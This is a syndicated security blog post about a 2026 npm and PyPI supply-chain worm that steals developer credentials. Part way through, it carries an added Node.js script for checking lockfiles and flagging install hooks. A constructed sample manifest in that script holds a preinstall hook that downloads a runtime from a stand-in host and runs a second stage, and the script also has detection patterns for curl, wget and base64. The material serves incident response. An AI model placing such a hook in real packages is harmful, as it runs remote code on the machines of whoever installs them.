
Mini Shai-Hulud Is Back: 172 npm and PyPI Packages Compromised in Latest Wave


The Mini Shai-Hulud supply chain campaign has resurfaced with its largest wave yet. Over a 48-hour window on May 11-12, 2026, attackers compromised 172 unique packages across 403 malicious versions on npm and PyPI, including high-profile scopes like @tanstack, @uipath, @mistralai, and @opensearch-project.

What happened

This is a continuation of the original Shai-Hulud campaign that first targeted SAP CAP packages in late April 2026. The attack pattern remains consistent: compromised packages execute a preinstall hook that downloads a Bun runtime and runs an obfuscated ~11.7 MB JavaScript credential stealer. Stolen secrets are exfiltrated through attacker-created GitHub repositories tagged with the signature phrase “A Mini Shai-Hulud has Appeared.”

What’s new in this wave

The scope has expanded dramatically. Instead of targeting a single vendor's packages, this wave hit packages from multiple organizations, on both npm and PyPI, simultaneously:

  • @uipath — 66 packages (agent SDKs, tooling, CLI)
  • @tanstack — 42 packages (router, start, devtools)
  • @squawk — 22 packages (aviation data tools)
  • @tallyui — 10 packages (POS and commerce components)
  • @mistralai — 3 packages (AI SDK for npm and PyPI)
  • @opensearch-project, @draftlab, @mesadev, and others

The attack also compromised unscoped packages like cross-stitch, ts-dna, wot-api, and safe-action.

What it steals

The payload targets developer and CI/CD credentials including:

  • SSH keys and Git configurations
  • AWS, Azure, GCP, and Kubernetes credentials
  • npm and GitHub tokens
  • Environment variables from CI runners
  • AI tool configurations (Claude Code, Kiro)

Critically, stolen npm tokens are used to propagate the attack: the malware identifies packages the victim can publish, injects malicious dependencies, bumps versions, and publishes compromised releases automatically. Every maintainer whose token is stolen therefore becomes a new publishing vector, which is why the wave grows across unrelated organizations.

What to do

  1. Check your dependencies – Compare the resolved versions in your lockfiles, CI logs, and build caches against the affected package versions, and treat any install on or after May 11-12, 2026 that pulled one of them as a compromise of that machine or runner.
  2. Rotate credentials – If you installed a compromised version, rotate all npm and GitHub tokens, SSH keys, and cloud credentials immediately, and treat every secret that was in the environment of the affected machine or CI runner as exposed.
  3. Pin versions – Use lockfiles and pinned versions so that installs cannot resolve to a newly published malicious release.
  4. Monitor for unauthorized publishes – Check your npm packages for version bumps you didn’t make.
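The dependency check in step 1 and the preinstall-hook pattern described under "What happened", as an added example in Node.js that is not part of the original post and not Mend's tooling. Everything in it is constructed: the advisory map, the two lockfiles, the manifests, and the hook command are hypothetical placeholders, not the real affected packages or the real payload. It goes slightly beyond the post by reading both the nested lockfileVersion 1 format and the flat `packages` map of lockfileVersion 2/3.

```javascript
// Added example, not code from the Mend post or its advisories.  Two checks a
// responder can run offline after a wave like this one:
//   (a) compare every resolved package in a package-lock.json against an
//       advisory list of malicious versions (lockfileVersion 1, 2 and 3);
//   (b) flag install-time lifecycle hooks whose command looks like the pattern
//       described in the post (fetch a runtime, run a script at preinstall).
// ALL data below is CONSTRUCTED: hypothetical package names, versions and
// commands, not the real affected packages or the real payload.

// (a) Hypothetical advisory: package name -> malicious versions.
const ADVISORY = {
  "@acme/router": ["1.2.3", "1.2.4"],
  "cross-stitch-demo": ["0.9.1"],
};

// Constructed lockfileVersion 3 lockfile.  npm keys "packages" by install path,
// so a duplicated dependency appears nested: node_modules/a/node_modules/b.
const SAMPLE_LOCK_V3 = {
  name: "my-app",
  lockfileVersion: 3,
  packages: {
    "": { name: "my-app", version: "1.0.0" },
    "node_modules/@acme/router": { version: "1.2.4" },
    "node_modules/left-pad": { version: "1.3.0" },
    "node_modules/foo": { version: "4.0.0" },
    "node_modules/foo/node_modules/cross-stitch-demo": { version: "0.9.1" },
  },
};

// Constructed lockfileVersion 1 lockfile: the same tree as nested "dependencies".
const SAMPLE_LOCK_V1 = {
  name: "my-app",
  lockfileVersion: 1,
  dependencies: {
    "@acme/router": { version: "1.2.4" },
    "left-pad": { version: "1.3.0" },
    foo: { version: "4.0.0", dependencies: { "cross-stitch-demo": { version: "0.9.1" } } },
  },
};

// The package name is everything after the LAST "node_modules/" segment, which
// keeps the scope ("@acme/router") and drops the parent it was nested under.
function packageNameFromLockPath(lockPath) {
  const marker = "node_modules/";
  const idx = lockPath.lastIndexOf(marker);
  return idx === -1 ? null : lockPath.slice(idx + marker.length);
}

// Yield { name, version, path } for every resolved package in either format.
function* iterLockEntries(lock) {
  if (lock.packages) {
    for (const [lockPath, entry] of Object.entries(lock.packages)) {
      const name = packageNameFromLockPath(lockPath);
      if (name && entry.version) yield { name, version: entry.version, path: lockPath };
    }
    return;
  }
  function* walk(deps, prefix) {
    for (const [name, entry] of Object.entries(deps || {})) {
      const lockPath = `${prefix}node_modules/${name}`;
      if (entry.version) yield { name, version: entry.version, path: lockPath };
      yield* walk(entry.dependencies, `${lockPath}/`);
    }
  }
  yield* walk(lock.dependencies, "");
}

// Exact-version match against the advisory.  Semver ranges are deliberately
// not used: the lockfile records the version that was actually installed.
function findCompromised(lock, advisory) {
  const hits = [];
  for (const e of iterLockEntries(lock)) {
    const bad = advisory[e.name];
    if (bad && bad.includes(e.version)) hits.push(e);
  }
  return hits;
}

// (b) Install-hook heuristics.  A legitimate package rarely needs to download
// a runtime or evaluate inline or base64 code during "npm install".
const INDICATORS = [
  { label: "bun runtime", re: /\bbun\b/i },
  { label: "network fetch", re: /\b(curl|wget)\b|fetch\(/i },
  { label: "inline code", re: /\bnode\s+-e\b|eval\(/ },
  { label: "encoded blob", re: /base64/i },
];

function auditInstallScripts(manifest) {
  const findings = [];
  for (const hook of ["preinstall", "install", "postinstall"]) {
    const cmd = manifest.scripts && manifest.scripts[hook];
    if (!cmd) continue;
    const labels = INDICATORS.filter((i) => i.re.test(cmd)).map((i) => i.label);
    if (labels.length) findings.push({ name: manifest.name, hook, cmd, labels });
  }
  return findings;
}

// Constructed manifests; the hook command is a hypothetical stand-in for the
// pattern in the post (download a runtime, run a second stage), not the real one.
const SAMPLE_MANIFESTS = [
  { name: "clean-lib", version: "2.0.0", scripts: { test: "mocha" } },
  { name: "@acme/router", version: "1.2.4",
    scripts: { preinstall: "curl -fsSL https://example.invalid/bun.tar.gz | tar xz && bun ./stage2.js" } },
];

function triage(lock, manifests, advisory) {
  return {
    compromised: findCompromised(lock, advisory),
    suspiciousHooks: manifests.flatMap(auditInstallScripts),
  };
}

// Stand-alone run on the constructed inputs.
console.log(JSON.stringify(triage(SAMPLE_LOCK_V3, SAMPLE_MANIFESTS, ADVISORY), null, 2));
```

To run it on a real project, replace the constructed lockfile with `JSON.parse(fs.readFileSync("package-lock.json", "utf8"))`, feed it the `package.json` of every directory under `node_modules`, and populate the advisory map from the affected-package lists. Note that a lockfile records versions, not install times, so the version comparison is the reliable test; CI logs and build caches are where the "installed on May 11-12" question is answered. Until the audit is done, `npm ci --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) stops lifecycle hooks like the one this campaign relies on from running at all.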

Mend coverage

Mend has issued three MSC advisories covering all 172 affected packages:

  • MSC-2026-5354 — 80 packages
  • MSC-2026-5355 — 80 packages
  • MSC-2026-5356 — 12 packages

*** This is a Security Bloggers Network syndicated blog from Mend authored by Tom Abai. Read the original post at: https://www.mend.io/blog/mini-shai-hulud-is-back-172-npm-and-pypi-packages-compromised-in-latest-wave/